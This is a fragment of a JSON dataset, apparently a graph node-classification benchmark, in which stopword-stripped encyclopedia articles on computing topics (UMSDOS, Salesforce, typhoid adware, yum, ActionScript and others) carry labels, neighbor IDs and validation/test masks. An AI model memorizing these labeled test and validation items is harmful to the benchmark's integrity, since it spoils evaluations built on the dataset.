sharing data fat disk volume linux operating systems windows data structures used windows vfat long filenames require running synchronization utility order prevent windows linux data structures becoming disjointed reason appropriate linux fat filesystem drivers use majority situations mentioned previously linux filesystem drivers support three file allocation table sizes 12-bit 16-bit 32-bit common features support various linux mounting options specified codice_2 option codice_1 command umsdos fat filesystem driver stores extra information relating unix file semantics another fat filesystem driver appears normal file directory subdirectory named codice_14 absence file given directory thus default umsdos filesystem driver provides semantics msdos filesystem driver directory 8.3 filenames extra unix file semantics enable umsdos driver extra abilities necessary create file directory synchronize internal data normal fat data existing entries already directory done tool called codice_15 utility program run across every directory disc volume every time one switches running windows running linux order umsdos filesystem driver incorporate changes made files directories windows private data structures codice_14 file default codice_15 tool creates codice_14 files directories already exist resulting file every directory disc volume switching windows linux behaviour often considered desirable therefore normal mode operation invoking codice_15 switching windows linux usually done running tool linux boot time startup script employ codice_20 option command prevents creation new codice_14 files directories already possess mentioned umsdos permits installing linux bootstrapping running fat format disc volume advantage permits use linux computer dos already installed without requiring hard disc repartitioned linux bootstrapped directly volume boot record scenario instead dos first bootstrapped loadlin linld used bootstrap linux dos convention installation linux root directory subdirectory actual root directory dos boot volume e.g codice_22 various linux top-level directories thus dos directories codice_23 codice_24 codice_25 codice_26 codice_27 codice_28 forth umsdos filesystem driver automatically prepends codice_29 pathnames location linux root directory supplied umsdos filesystem driver first place via option codice_30 command example aforegiven root directory codice_30 would invoked command line loadlin c \\linux\\boot\\vmlinuz rw root=c \\linux installation linux directory first place simply involves unpacking files archive directory subdirectories installation also generally requires use swap file rather swap partition linux however related desire repartition hard disc unrelated umsdos filesystem driver per se major linux distributions including redhat suse debian employ umsdos permit installation linux fat disc volume distributions however include distributions phat linux installs codice_32 dos unpacking zip file booted running command.com script named codice_33 zipslack umsdos project started 1992 jacques gelinas made available net january 1994 patch included standard distribution starting kernel 1.1.36 umsdos removed linux 2.6.11 kernel lack maintenance uvfat extension umsdos use windows data structures long filenames instead discontinued release work 2.4.x kernels earlier linux distributions used umsdos mulinux monkey linux winlinux 2000 although filesystem drivers kernel make possible access files directories fat formatted volumes normal manner also possible without kernel driver support using utility programs form mtools utility suite like vfat fat filesystem driver mtools provides long filename support using disc data structures microsoft windows uses alternately one fuse filesystem drivers may used—fatfuse fusefat mountlo modern equivalent umsdos posix overlay filesystem posixovl works fuse",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      11323,
      8772,
      4708,
      5220,
      9836,
      7789,
      9840,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      2201,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      178,
      2230,
      5816,
      1212,
      8380,
      10951,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      9972,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      6961,
      823,
      1336,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      451,
      8643,
      7126,
      1509,
      9189,
      11256,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10088,
    "label": 5,
    "text": "Cyberduck:cyberduck cyberduck open-source client ftp sftp webdav cloud storage openstack swift amazon s3 backblaze b2 microsoft azure available macos windows version 4.0 licensed gpl cyberduck written java c using cocoa user interface framework macos windows forms windows supports ftp/tls ftp secured ssl/tls using auth tls well directory synchronization user interacts user interface gui including file transfer drag drop notifications via growl also able open files external text editors cyberduck includes bookmark manager supports apple keychain bonjour networking supports multiple languages including english catalan czech chinese traditional simplified danish dutch finnish french german hebrew hungarian indonesian italian japanese korean norwegian polish portuguese russian slovak spanish swedish thai turkish ukrainian welsh cyberduck creator also provides version command-line interface cli called duck available windows macos linux website duck.sh",
    "neighbors": [
      3969,
      1935,
      546,
      1960,
      11178,
      2603,
      5677,
      7983,
      2864,
      823,
      576,
      11201,
      7364,
      1101,
      8909,
      8147,
      10971,
      4194,
      10851,
      9320,
      4457,
      8303
    ],
    "mask": "None"
  },
  {
    "node_id": 10089,
    "label": 9,
    "text": "JOVIAL:jovial jovial high-level computer programming language similar algol specialized development embedded systems specialized computer systems designed perform one dedicated functions usually embedded part complete device including mechanical parts jovial developed new high-order programming language beginning 1959 team system development corporation sdc headed jules schwartz compose software electronics military aircraft name jovial acronym jules version international algorithmic language international algorithmic language ial name originally proposed algol 58 according schwartz language originally called ovial met opposition various reasons jovial suggested meaning attached j somewhat jokingly suggested language named schwartz since chairing meeting unofficial name stuck 1960s jovial part us military l-project series particular 465l saccs project due lack real-time processing languages available 95 percent saccs project managed itt software primarily written sdc written jovial software project took two years fewer 1400 programmer years less half equivalent time sage l-project late 1970s early 1980s u.s. air force adopted standardized cpu mil-std-1750a subsequent jovial programs built processor several commercial vendors provided compilers related tools build jovial processors mil-std-1750a including advanced computer techniques act tld systems proprietary software systems pss others jovial standardized 1973 mil-std-1589 revised 1984 mil-std-1589c still much used update maintain software older military vehicles aircraft three dialects common use j3 j3b-2 j73 jovial longer maintained distributed usaf jovial program office jpo software previously distributed jpo still available commercial resources software engineering associates inc. sea combinations host/target processors including microsoft windows linux mac os x powerpc sparc vax 1750a powerpc ti-9989 zilog z800x motorola 680x0 ibm system 360/system 370/system z addition ddc-i acquired parts advanced computer techniques also still lists jovial compilers related tools software implemented jovial mission critical maintenance getting difficult december 2014 reported software derived jovial code produced 1960s involved major failure united kingdom air traffic control infrastructure agency uses train staff jovial could maintain software scheduled replacement 2016 conversion jovial code new platforms therefore becoming common jovial rehosting retargeting currently done software engineering associates conversions jovial languages currently done semantic designs whose dms software reengineering toolkit used convert jovial mission software b-2 bomber c. languages influenced jovial include coral sympl space programming language spl extent cms-2 interactive subset jovial called tint similar joss developed 1960s jovial includes features found standard algol records arrays records inline assembly language notable systems using jovial include airborne radar systems embedded jovial software include apg-70 apg-71 apg-73 following example taken computer programming manual jovial j73 language proc retrieve code value example defines procedure named codice_1 takes unsigned integer input argument codice_2 floating-point output argument codice_3 searches 1000-element array codice_4 entry matches codice_2 sets floating-point variable codice_3 element array codice_7 matching array index matching element found codice_3 set codice_9",
    "neighbors": [
      512,
      9345,
      4998,
      6797,
      11153,
      3613,
      5551,
      823,
      11447,
      10430,
      1610,
      1611,
      9804,
      721,
      11219,
      11604,
      11625,
      10474,
      1776,
      9330,
      10098,
      2804,
      1399,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10090,
    "label": 7,
    "text": "Salesforce.com:salesforce.com salesforce.com inc. usually abbreviated sf sfdc american cloud-based software company headquartered san francisco california though bulk revenue comes customer-relationship management crm service salesforce training also sells complementary suite enterprise applications focused customer service marketing automation analytics application development salesforce ranked first fortune 100 best companies work 2018 company founded 1999 former oracle executive marc benioff parker harris dave moellenhoff frank dominguez company specializing software service saas harris moellenhoff dominguez three software developers previously consulting firm left coast software introduced benioff friend former oracle colleague bobby yazdani harris team wrote initial sales automation software launched first customers sept-nov 1999 june 2004 company initial public offering new york stock exchange stock symbol crm raised us 110 million early investors include larry ellison magdalena yesil halsey minor stewart henderson mark iscaro igor sill geneva venture partners july 2012 salesforce applied trademark term social enterprise united states european union jamaica term widespread use describe businesses primarily social purpose successfully challenged campaign called notinourname launched social enterprise uk resulting salesforce.com withdrawing trademark application agreeing use term future marketing october 2014 salesforce announced development customer success platform tie together salesforce services including sales service marketing analytics community mobile apps october 2017 salesforce launched facebook analytics tool business-to-business marketers september 2018 salesforce partnered apple intended improving apps businesses salesforce.com customer-relationship management crm service comprises several broad categories commerce cloud sales cloud service cloud data cloud including jigsaw marketing cloud community cloud including chatter analytics cloud app cloud iot 100,000 customers salesforce primary enterprise offering within salesforce platform provides companies interface case management task management system automatically routing escalating important events salesforce customer portal provides customers ability track cases includes social networking plug-in enables user join conversation company social networking web sites provides analytical tools services including email alert google search access customers entitlement contracts lightning platform also known force.com platform service paas allows developers create add-on applications integrate main salesforce.com application third-party applications hosted salesforce.com infrastructure force.com applications built using declarative tools backed lightning apex proprietary java-like programming language force.com lightning visualforce framework includes xml syntax typically used generate html force.com platform typically receives three complete releases year platform provided service developers every single development instance also receives updates spring 2015 release new framework building user interfaces – lightning components – introduced beta lightning components built using open-source aura framework support apex server-side language instead aura javascript dependency described alternative necessarily replacement visualforce pages according september 2009 gartner group report force.com 1,000 customer accounts 2013 force.com platform 1.4 million registered developers community cloud provides salesforce customers ability create online web properties external collaboration customer service channel sales custom portals instance salesforce tightly integrated sales cloud service cloud app cloud community cloud quickly customized provide wide variety web properties work.com previously rypple social performance management platform helps managers employees improve work performance continuous coaching real-time feedback recognition marketed solution sales performance customer service marketing service employed human resource departments work.com known rypple founded daniel debow david stein wanted create simple way asking feedback anonymously work company formed may 2008 client list included mozilla facebook linkedin gilt groupe rypple 'reverses onus demand feedback getting employees build manage coaching networks september 2011 rypple announced hired bohdan zabawskyj chief technology officer 2011 rypple developed formalized management methodology called okr objectives key results spotify rypple also partnered facebook create loops short feedback loops gathers feedback co-workers thank progress goals coaching supervisors one channel rich robust continuous performance review december 2011 salesforce.com announced would acquire rypple transaction completed 2012 rypple rebranded work.com september 2012 launched 2005 salesforce appexchange online application marketplace third-party applications run force.com platform applications available free well via yearly monthly subscription models applications available range integrations sharepoint mobile approval management june 2016 features 2,948 applications driven 3+ million installs appexchange also place customers search cloud consulting partners help implement technology organization cloud consulting partners salesforce include large companies like ibm bluewolf accenture well smaller ones like cloudreach announced 2017 launched 2019 salesforce mytrailhead online training platform customized specific needs customers platform extends functionality salesforce built provide users training content specific usage salesforce enables users create publish training content programs announced may 29 2019 salesforce launched blockchain platform facilitate building blockchain network apps integrated crm data.com previously known jigsaw cloud-based automated system acquiring managing crm records within user salesforce.com account data.com also online business directory companies business professionals built maintained accessed worldwide community million subscribers. information consisted commonly found business card data.com competitors included services dun bradstreet/avention zoominfo data.com made three products data.com connect data.com clean data.com prospector april 2018 salesforce announced would retire data.com connect may 4 2019 salesforce also announced wind data.com clean data.com prospector services close july 31 2020 desk.com saas help desk customer support product accessible cloud desk.com owned salesforce.com previously known assistly desk.com headquartered san francisco california acquired salesforce.com 50 million 2011 assistly re-branded desk.com 2012 customer support software desk.com saas customer service application product differentiates salesforce service platform desk.com specifically targets small businesses features functions desk.com integrates variety products third-party applications including salesforce crm salesforce iq atlassian jira mailchimp apps desk.com also supports 50 languages salesforce announced retirement desk.com replacing service cloud lightning march 13 2018 new desk.com licenses sold retirement date announced march 13 2020 do.com cloud-based task management system small groups businesses introduced 2011 discontinued 2014 salesforce offer reason shutting service however provided export tool save data entered within do.com interface do.com domain sold startup 2014 salesforce users configure crm application system tabs contacts reports accounts tab contains associated information configuration done tab adding user-defined custom fields configuration also done platform level adding configured applications salesforce instance adding sets customized novel tabs specific vertical- function-level finance human resources etc features addition web interface salesforce offers soap/rest web service application programming interface api enables integration systems salesforce works model–view–controller architecture apex proprietary programming language provided force.com platform developers similar java c strongly typed object-oriented case-insensitive programming language following dot-notation curly-brackets syntax apex used execute programmed functions processes force.com platform including custom buttons links event handlers record insertion update deletion via scheduling via custom controllers visualforce pages due multitenant nature platform language strictly imposed governor limitations guard code monopolizing shared resources salesforce provides series asynchronous processing methods apex allow developers produce longer-running complex apex code 2014 salesforce made public front end platform called lightning component-based framework salesforce mobile app built salesforce built framework 2015 releasing lightning design system html style framework default css styling built framework allows customers build components either use internal instances sell appexchange salesforce lightning app builder tool rapid application development responsive web interfaces interface allows different screens put together based lightning components used layouts records specific applications lightning experience new redesigned interface salesforce processes enhancement released 2016 since apps available appexchange need lightning built classic migrate lightning classic updated salesforce platform offers option developers employ migration techniques enable new user interface switch lightning salesforce headquartered san francisco regional headquarters morges switzerland covering europe middle east africa singapore india covering asia pacific minus japan tokyo covering japan major offices toronto chicago new york city london sydney dublin hyderabad san mateo california indianapolis hillsboro oregon salesforce.com services translated 16 different languages july 31 2011 104,000 customers 2.1 million subscribers salesforce move midwest regional headquarters indianapolis 2017 standard poor included salesforce time fastenal p 500 index september 2008 following federal takeover fannie mae freddie mac removal index fiscal year 2018 salesforce reported earnings us 127 million annual revenue us 10.480 billion increase 24.9 previous fiscal cycle salesforce shares traded 131 per share market capitalization us 102.5 billion october 2018 salesforce ranked 285 2018 fortune 500 list largest united states companies revenue salesforce migrated dell servers advanced micro devices processors running linux sun fire e25k servers sparc processors running solaris 2008 company uses momentum platform message systems allow customers send large amounts email 2012 salesforce announced plans build data center uk handle european citizens personal data 2013 salesforce oracle announced nine-year partnership salesforce use oracle linux oracle exadata oracle database java platform power salesforce applications saas platform 2016 salesforce announced use amazon web services hosting countries restrictive data residency requirements salesforce data centers operating july 2017 first salesforce instance went live canada salesforce announcing enabled signing number canadian customers following list acquisitions salesforce november 2007 successful phishing attack salesforce employee compromised contact information number salesforce customers used send highly targeted phishing emails salesforce stated phisher tricked someone disclosing password intrusion stem security flaw salesforce.com application database phishing breach cited example crm industry needs greater security users threats spam crowd-sourced method building business contacts proven popular recruiters marketers sales professionals also raised questions privacy site database entered without permission person listed data.com however make easy remove business information request noted december 2009 techcrunch however recipients messages regard spam least one complaint receiving spam attempting remove one address noted 2017 def con salesforce director offensive security security engineer fired conference room floor front several attendees executive company giving talk word rapidly spread two speakers released event presentation initially signed company however salesforce management team unexplained sudden change heart hour event salesforce director offensive security turned phone prior presentation unable receive communication salesforce prior presentation reaction firings swift electronic frontier foundation providing representation fired employees members security community opining salesforce undermined credibility security community significant degree perceived security community n't top list things care presented meatpistol tool anticipated released open source time presentation salesforce continues hold back releasing code developers public terminated employees continued call company open-source software not-for-profit organization refugee immigrant center education legal services raices rejected us 250,000 philanthropic donation salesforce company contracts customs border patrol sic executive director raices jonathan ryan tweeted comes supporting oppressive inhumane illegal policies want clear right action stop reference rejected donation salesforce ceo marc benioff responded official statement company employees dont work cbp regarding separation families cbp customer follows tos dont agreement ice 'm proud men women protect serve country every day 'm proud ohana reported change acceptable-use policy salesforce barring customers using system sell semiautomatic guns firearms march 2019 salesforce faced lawsuit 50 anonymous women claiming victims survivors sex trafficking abuse rape alleges company profited knowingly facilitated sex trafficking web site backpage.com defunct since april 2018 lawsuit also pointed ironically salesforce publicly promoting anti-human trafficking campaign time work backpage 2009 response financial crisis 2007–2008 resulting decline venture funding salesforce began investing digital companies used integrated salesforce platform. ref name= peterson bi 8/18/2018 /ref eventually became salesforce ventures headed john somorjai since various funds created focus specific areas — september 2014 sfv set salesforce1 fund aimed start-ups creating applications primarily mobile phones december 2018 salesforce ventures announced launch japan trailblazer fund focused japanese startups august 2018 salesforce ventures reported investments totaling 1.2 billion 275 companies covering wide range business models including cloud storage cloudcraze artificial intelligence figure eight online fraud prevention forter accounting project software financialforce many areas five largest investments domo data-visualization software surveymonkey online survey software twilio cloud-communication dropbox cloud storage docusign secure e-signature company account nearly half portfolio. ref name= peterson bi 11/14/2018 /ref",
    "neighbors": [
      0,
      1539,
      4621,
      526,
      3087,
      4623,
      10773,
      8217,
      10265,
      5662,
      5666,
      9252,
      9766,
      39,
      5159,
      7721,
      5677,
      3121,
      3634,
      5681,
      10820,
      6729,
      4683,
      590,
      79,
      1102,
      7248,
      5202,
      4194,
      5732,
      10340,
      8817,
      2170,
      10887,
      2696,
      1675,
      4236,
      10893,
      10911,
      8353,
      6307,
      2217,
      5295,
      7345,
      9906,
      7352,
      9401,
      4288,
      1217,
      4289,
      3269,
      1224,
      6348,
      2768,
      10454,
      8921,
      1755,
      6367,
      8416,
      1259,
      2795,
      3819,
      5876,
      10486,
      3323,
      253,
      8446,
      8451,
      3848,
      265,
      272,
      5398,
      7447,
      2328,
      4377,
      8986,
      11038,
      4388,
      10020,
      2855,
      6444,
      8495,
      7475,
      11070,
      7489,
      8515,
      7493,
      8520,
      4428,
      4429,
      1362,
      7512,
      3428,
      10090,
      8555,
      8044,
      1400,
      11640,
      5499,
      7547,
      11646,
      6018,
      6027,
      911,
      1935,
      8592,
      9104,
      405,
      2965,
      10134,
      5017,
      9116,
      5553,
      10681,
      448,
      2496,
      11201,
      9682,
      467,
      5587,
      10200,
      7129,
      6618,
      6111,
      6632,
      1001,
      8170,
      7660,
      10735,
      3057,
      8191
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10091,
    "label": 6,
    "text": "Readahead:readahead readahead system call linux kernel loads file contents page cache prefetches file subsequently accessed contents read main memory ram rather hard disk drive hdd resulting much lower file access latencies many linux distributions use readahead list commonly used files speed booting setup kernel booted profile boot parameter record file accesses bootup write new list files read later boot sequences make additional installed services start faster included default readahead list linux distributions use systemd readahead binary part boot sequence replaced systemd-readahead however support readahead removed systemd version 217 described unmaintained unable provide expected performance benefits certain experimental page-level prefetching systems developed improve performance",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      3618,
      6180,
      8242,
      9266,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      8379,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      4841,
      7403,
      10482,
      2294,
      8439,
      2809,
      2811,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      10016,
      295,
      819,
      823,
      6968,
      7992,
      318,
      4926,
      3911,
      6988,
      2383,
      10063,
      5975,
      11095,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      9667,
      457,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 10092,
    "label": 4,
    "text": "Typhoid_adware:typhoid adware typhoid adware type computer security threat uses man-in-the-middle attack inject advertising web pages user visits using public network like wifi hotspot researchers university calgary identified issue require affected computer adware installed order display advertisements computer researchers said threat yet observed described mechanism potential countermeasures environment threat work area non-encrypted wireless connection wireless internet cafe wifi hotspots typhoid adware would trick laptop recognize wireless provider inserts route wireless connection computer actual provider adware may insert various advertisements data stream appear computer browsing session way even video stream e.g. youtube may modified adware may run infested computer whose owner would see manifestations yet affect neighboring ones latter peculiarity named analogy typhoid mary mary mallon first identified person never experienced symptoms yet spread infection time running antivirus software affected computer useless since adware installed implemented proof concept described article written march 2010 daniel medeiros nunes de castro eric lin john aycock mea wang typhoid adware variant well-known man-in-the-middle attack researchers point number new important issues protection video content growing availability public wireless internet access well-monitored researchers say annoying advertisements tip iceberg serious danger may come e.g. promotions rogue antivirus software seemingly coming trusted source suggested countermeasures include approaches investigated earlier contexts",
    "neighbors": [
      612,
      2213,
      5636,
      877,
      2996,
      1369,
      794,
      6013,
      2558,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 10093,
    "label": 3,
    "text": "River_Raid:river raid river raid vertically scrolling shooter designed programmed carol shaw published activision 1982 atari 2600 video game console million game cartridges sold activision later ported title atari 5200 colecovision intellivision consoles well commodore 64 ibm pcjr msx zx spectrum atari 8-bit family shaw atari 8-bit atari 5200 ports activision published less successful sequel 1988 without shaw involvement viewed top-down perspective player flies fighter jet river return raid behind enemy lines player jet move left right—it maneuver screen—but accelerate decelerate player jet crashes collides riverbank enemy craft jet runs fuel assuming fuel replenished player evades damage gameplay essentially unlimited player scores points shooting enemy tankers 30 points helicopters 60 points fuel depots 80 points jets 100 points bridges 500 points jet refuels flies fuel depot bridge marks end game level non-atari 2600 ports game add hot air balloons worth 60 points shot well tanks along sides river shoot player jet destroying bridges also serve game checkpoints player crashes plane start next jet last destroyed bridge time river raid provided inordinate amount non-random repeating terrain despite constrictive computer memory limits game program actually store sequence terrain objects instead procedural generation algorithm manifests employing linear feedback shift register hard-coded vector starting value hard-coded algorithm generates game world every time program executes enemy crafts ai however relies random number generator make enemy movement less predictable infoworld 1983 stated river raid might best atari 8-bit game year challenging vcs version superior others like caverns mars antic 1984 said atari 8-bit version identical 2600 original slightly spiffed ... game visuals deseret news 1984 called river raid one playable entertaining war games newspaper gave colecovision version four stars recommending console owners describing definite winner way game received award 1984 best action videogame certificate merit category 1984 best computer action game 5th annual arkie awards judges described provid ing brand non-stop excitement blast brigaders adore river raid first video game banned minors west germany federal department writings harmful young persons german bundesprüfstelle für jugendgefährdende schriften 1996 next generation listed atari 2600 version number 81 top 100 games time commenting nostalgia aside 2600 sucks ... game still great one main reason level design activision published relatively obscure river raid ii atari 2600 1988 sequel programmed david lubar based concept dan kitchen similar gameplay different landscape increased difficulty 1995 river raid published microsoft windows part activision atari 2600 action pack",
    "neighbors": [
      3075,
      7051,
      6797,
      9006,
      9998,
      10931
    ],
    "mask": "None"
  },
  {
    "node_id": 10094,
    "label": 2,
    "text": "Telecommunications_Access_Method:telecommunications access method telecommunications access method tcam access method ibm os/360 successors computer operating systems ibm system/360 later provides access terminals units within teleprocessing network tcam provides similar functionality qtam replaced access method initial version time sharing option tso advent ibm sna tcam eventually superseded vtam tcam said following enhancements qtam tcam consists message control program mcp zero application programs mcp handles communications terminals identifies input messages starts application programs process required similar concept much later internet service daemon inetd unix systems also similar qtam application programs called message processing programs mpp mcp assembled user installation set macros supplied ibm macros define lines terminals comprising system datasets required procedures used process received transmitted messages application programs incorporating logic process various messages supplied installation use standard os/360 data management macros codice_1 codice_2 either basic macros codice_3 codice_4 codice_5 queued macros codice_6 codice_7 use sam macros allows application programs tested batch processing environment tcam initially supported support 3270 terminals soon added",
    "neighbors": [
      11656,
      10508,
      7312,
      7836,
      10415,
      10040,
      2616,
      5562,
      4546,
      1478,
      8393,
      8138,
      10958,
      8911,
      3669,
      10072,
      8290,
      868,
      7272,
      4586,
      6647,
      11131,
      2813
    ],
    "mask": "Test"
  },
  {
    "node_id": 10095,
    "label": 3,
    "text": "Mobile-ITX:mobile-itx mobile-itx smallest 2009 x86 compliant motherboard form factor presented via technologies december 2009 motherboard size cpu module computer ports cpu module necessary use i/o carrier board design intended medical transportation military embedded markets mobile-itx form factor announced via technologies computex june 2007 motherboard size first prototypes design intended ultra-mobile computing smartphone umpc prototype boards shown date include x86-compliant 1 ghz via c7-m processor 256 512 megabytes ram modified version via cx700 chipset called cx700s interface cellular radio module demonstration boards contain cdma radio dc-dc electrical converter various connecting interfaces announcement ultra-mobile pc reference design shown running windows xp embedded",
    "neighbors": [
      10337,
      2500,
      455,
      7113,
      9307,
      3883,
      7151,
      2161,
      499,
      2803,
      10715,
      8730,
      1083,
      3037
    ],
    "mask": "Test"
  },
  {
    "node_id": 10096,
    "label": 2,
    "text": "Yum_(software):yum software yellowdog updater modified yum free open-source command-line package-management utility computers running linux operating system using rpm package manager though yum command-line interface several tools provide graphical user interfaces yum functionality yum allows automatic updates package dependency management rpm-based distributions like advanced package tool apt debian yum works software repositories collections packages accessed locally network connection hood yum depends rpm packaging standard digital distribution software automatically uses hashes digisigs verify authorship integrity said software unlike app stores serve similar function neither yum rpm provide built-in support proprietary restrictions copying packages end-users yum implemented libraries python programming language small set programs provide command-line interface gui-based wrappers yum extender yumex also exist rewrite yum named dnf replaced yum default package manager fedora 22 dnf created improve yum several ways improved performance better resolution dependency conflicts easier integration software applications original package manager yellowdog updater yup developed 1999-2001 dan burcaw bryan stillwell stephen edie troy bengegerdes terra soft solutions leadership ceo kai staats back-end engine graphical installer yellow dog linux.. full rewrite yup yum evolved primarily update manage red hat linux systems used duke university department physics seth vidal michael stenner vidal continued contribute yum death durham north carolina bicycle accident 8 july 2013 2003 robert g. brown duke published documentation yum subsequent adopters included fedora centos many rpm-based linux distributions including yellow dog linux yum replaced original yup utility — last updated sourceforge 2001 2005 estimated use half linux market 2007 yum considered tool choice rpm-based linux distributions yum aimed address perceived deficiencies old apt-rpm restrictions red hat up2date package management tool yum superseded up2date red hat enterprise linux 5 later authors refer yum yellowdog update manager suggest update manager would appropriate basic knowledge yum often included requirement linux system-administrator certification gnu general public license yum allows free open-source software freely distributed modified without royalty terms license honored codice_1 perform operations 2.x versions yum feature additional interface programming extensions python allows behavior yum altered certain plug-ins installed default commonly installed package codice_2 contains commands use yum api many plugins graphical user interfaces known front-ends allow easier use yum packagekit yum extender yumex two examples information packages opposed packages known metadata metadata combined information package determine resolve possible dependencies among packages hope avoid situation known dependency hell separate tool codice_3 sets yum software repositories generating necessary metadata standard xml format sqlite metadata given -d option codice_4 tool formerly known yam help creation maintenance repositories yum xml repository built input many developers quickly became standard rpm-based repositories besides distributions use yum directly suse linux 10.1 added support yum repositories yast open build service repositories use yum xml repository format metadata yum automatically synchronizes remote meta data local client tools opting synchronize requested user automatic synchronization means yum fail due user failing run command correct interval",
    "neighbors": [
      2050,
      11525,
      2310,
      10760,
      9353,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      5670,
      4775,
      7847,
      5546,
      6828,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3791,
      3667,
      6227,
      4951,
      6361,
      2010,
      9564,
      479,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      6119,
      8554,
      9063,
      9324,
      9197,
      11500,
      7920,
      2417,
      1138,
      1522,
      6257,
      6393,
      7293
    ],
    "mask": "Test"
  },
  {
    "node_id": 10097,
    "label": 9,
    "text": "ActionScript:actionscript actionscript object-oriented programming language originally developed macromedia inc. later acquired adobe systems influenced hypertalk scripting language hypercard implementation ecmascript meaning superset syntax semantics language widely known javascript though originally arose sibling influenced hypertalk actionscript used primarily development websites software targeting adobe flash player platform used web pages form embedded swf files actionscript 3 also used adobe air system development desktop mobile applications language open-source specification offered free charge open source compiler part apache flex open source virtual machine mozilla tamarin available actionscript also used scaleform gfx development 3d video game user interfaces huds actionscript initially designed controlling simple 2d vector animations made adobe flash formerly macromedia flash initially focused animation early versions flash content offered interactivity features thus limited scripting capability later versions added functionality allowing creation web-based games rich internet applications streaming media video audio today actionscript suitable desktop mobile development adobe air use database applications basic robotics make controller kit flash mx 2004 introduced actionscript 2.0 scripting language suited development flash applications often possible save time scripting something rather animating usually also enables higher level flexibility editing since arrival flash player 9 alpha 2006 newer version actionscript released actionscript 3.0 version language intended compiled run version actionscript virtual machine completely re-written ground dubbed avm2 code written actionscript 3.0 generally targeted flash player 9 higher work previous versions time actionscript 3.0 executes 10 times faster legacy actionscript code due just-in-time compiler enhancements flash libraries used xml capabilities browser render rich content browser technology known asynchronous flash xml much like ajax adobe offers flex product line meet demand rich internet applications built flash runtime behaviors programming done actionscript actionscript 3.0 forms foundation flex 2 api actionscript started object-oriented language macromedia flash authoring tool developed adobe systems adobe flash first three versions flash authoring tool provided limited interactivity features early flash developers could attach simple command called action button frame set actions basic navigation controls commands play stop geturl gotoandplay release flash 4 1999 simple set actions became small scripting language new capabilities introduced flash 4 included variables expressions operators statements loops although referred internally actionscript flash 4 user manual marketing documents continued use term actions describe set commands 2000–2004 actionscript 1.0 release flash 5 september 2000 actions flash 4 enhanced named actionscript first time first version actionscript influences javascript ecma-262 third edition standard supporting said standard object model many core data types local variables may declared statement user-defined functions parameter passing return values also created notably actionscript could also typed text editor rather assembled choosing actions drop-down lists dialog box controls next release authoring tool flash mx corresponding player flash player 6 language remained essentially unchanged minor changes addition statement strict equality operator brought closer ecma-262-compliant two important features actionscript distinguish later versions loose type system reliance prototype-based inheritance loose typing refers ability variable hold type data allows rapid script development particularly well-suited small-scale scripting projects prototype-based inheritance actionscript 1.0 mechanism code reuse object-oriented programming instead keyword defines common characteristics class actionscript 1.0 uses special object serves prototype class objects common characteristics class defined class prototype object every instance class contains link prototype object 2003–2006 actionscript 2.0 next major revision language actionscript 2.0 introduced september 2003 release flash mx 2004 corresponding player flash player 7 response user demand language better equipped larger complex applications actionscript 2.0 featured compile-time type checking class-based syntax keywords allowed structured object-oriented programming approach code would still compiled actionscript 1.0 bytecode allowing used preceding flash player 6 well words class-based inheritance syntax layer top existing prototype-based system actionscript 2.0 developers could constrain variables specific type adding type annotation type mismatch errors could found compile-time actionscript 2.0 also introduced class-based inheritance syntax developers could create classes interfaces much would class-based languages java c++ version conformed partially ecmascript fourth edition draft specification 2006–today actionscript 3.0 june 2006 actionscript 3.0 debuted adobe flex 2.0 corresponding player flash player 9 actionscript 3.0 fundamental restructuring language much uses entirely different virtual machine flash player 9 contains two virtual machines avm1 code written actionscript 1.0 2.0 avm2 content written actionscript 3.0 actionscript 3.0 added limited support hardware acceleration directx opengl update language introduced several new features adobe air supports actionscript addition extended contents stage3d engine adobe developed number apis application programming interfaces available actionscript 3.0 also risen dramatically actionscript code free form thus may created whichever amount style whitespace author desires basic syntax derived ecmascript following code works compliant player creates text field depth 0 position 0 0 screen measured pixels 100 pixels wide high codice_1 parameter set string automatically displayed player writing external actionscript 2.0 class files example could written file named following actionscript 3.0 similar syntax actionscript 2.0 different set apis creating objects compare script previous actionscript 2.0 version var greet textfield new textfield greet.text hello world this.addchild greet minimal actionscript 3.0 programs may somewhat larger complicated due increased separation programming language flash ide presume following file package com.example actionscript 3 also used mxml files using apache flex framework actionscript primarily consists fundamental simple data types used create data types data types similar java data types since actionscript 3 complete rewrite actionscript 2 data types inheritances changed actionscript 2 top level data types actionscript 2 complex data types additional complex data types processor memory intensive consist many simple 